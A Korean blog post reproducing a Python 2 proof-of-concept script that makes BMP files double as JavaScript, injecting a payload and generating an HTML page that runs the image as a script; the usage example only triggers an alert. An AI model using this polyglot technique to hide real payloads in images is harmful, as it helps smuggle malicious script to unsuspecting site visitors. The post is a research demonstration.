Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다.
연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다.
bmp 이미지안에 스크립크 삽입
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 |
#!/usr/bin/env python2 #==============================================================================# #======= Simply injects a JavaScript Payload into a BMP. ===========================# #======= The resulting BMP must be a valid (not corrupted) BMP. ====================# #======= Author: marcoramilli.blogspot.com =======================================# #======= Version: PoC (don't even think to use it in development env.) ================# #======= Disclaimer: ============================================================# #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #POSSIBILITY OF SUCH DAMAGE. #==============================================================================# import argparse import os #--------------------------------------------------------- def _hexify(num): """ Converts and formats to hexadecimal """ num = "%x" % num if len(num) % 2: num = '0'+num return num.decode('hex') #--------------------------------------------------------- #Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"] #;alert(_0xe428[0]);" def _generate_and_write_to_file(payload, fname): """ Generates a fake but valid BMP within scriting """ f = open(fname, "wb") header = (b'\x42\x4D' #Signature BM b'\x2F\x2A\x00\x00' #Header File size, but encoded as /* <-- Yes it's a valid header b'\x00\x00\x00\x00' #Reserved b'\x00\x00\x00\x00' #bitmap data offset b''+ _hexify( len(payload) ) + #bitmap header size b'\x00\x00\x00\x14' #width 20pixel .. it's up to you b'\x00\x00\x00\x14' #height 20pixel .. it's up to you b'\x00\x00' #nb_plan b'\x00\x00' #nb per pixel b'\x00\x10\x00\x00' #compression type b'\x00\x00\x00\x00' #image size .. its ignored b'\x00\x00\x00\x01' #Horizontal resolution b'\x00\x00\x00\x01' #Vertial resolution b'\x00\x00\x00\x00' #number of colors b'\x00\x00\x00\x00' #number important colors b'\x00\x00\x00\x80' #palet colors to be complient b'\x00\x80\xff\x80' #palet colors to be complient b'\x80\x00\xff\x2A' #palet colors to be complient b'\x2F\x3D\x31\x3B' #*/=1; ) # I made this explicit, step by step . f.write(header) f.write(payload) f.close() return True #--------------------------------------------------------- def _generate_launching_page(f): """ Creates the HTML launching page """ htmlpage =""" <html> <head><title>Opening an image</title> </head> <body> <img src=\"""" + f + """\"\> <script src= \"""" + f + """\"> </script> </body> </html> """ html = open("run.html", "wb") html.write(htmlpage); html.close() return True #--------------------------------------------------------- def _inject_into_file(payload, fname): """ Injects the payload into existing BMP NOTE: if the BMP contains \xFF\x2A might caouse issues """ # I know, I can do it all in memory and much more fast. # I wont do it here. f = open(fname, "r+b") b = f.read() b.replace(b'\x2A\x2F',b'\x00\x00') f.close() f = open(fname, "w+b") f.write(b) f.seek(2,0) f.write(b'\x2F\x2A') f.close() f = open(fname, "a+b") f.write(b'\xFF\x2A\x2F\x3D\x31\x3B') f.write(payload) f.close() return True #--------------------------------------------------------- if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("filename",help="the bmp file name to be generated/or infected") parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"") parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap") args = parser.parse_args() print(""" |======================================================================================================| | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal. | | It is the end user's responsibility to obey all applicable local, state and federal laws. | | Authors assume no liability and are not responsible for any misuse or damage caused by this program | |======================================================================================================| """) if args.inject_to_existing_bmp: _inject_into_file(args.js_payload, args.filename) else: _generate_and_write_to_file(args.js_payload, args.filename) _generate_launching_page(args.filename) print "[+] Finished!" |
사용법
1 |
bmp_script_injection.py -i test.bmp "alert('bmp script injection test');" |
먼저 생성된 run.html 소스를 보면, script에 bmp 이미지를 준 것을 볼 수 있다..
그리고 run.html 을 실행해보면, script 가 동작하는 것을 볼 수 있다.(이미지도 정상적으로 나온다.)
그래서 Hex Editer 으로 보니, 마지막부분에 injection 한 script 를 볼 수 있었다.
참고 : http://marcoramilli.blogspot.com.es/2013/10/hacking-through-images.html?m=1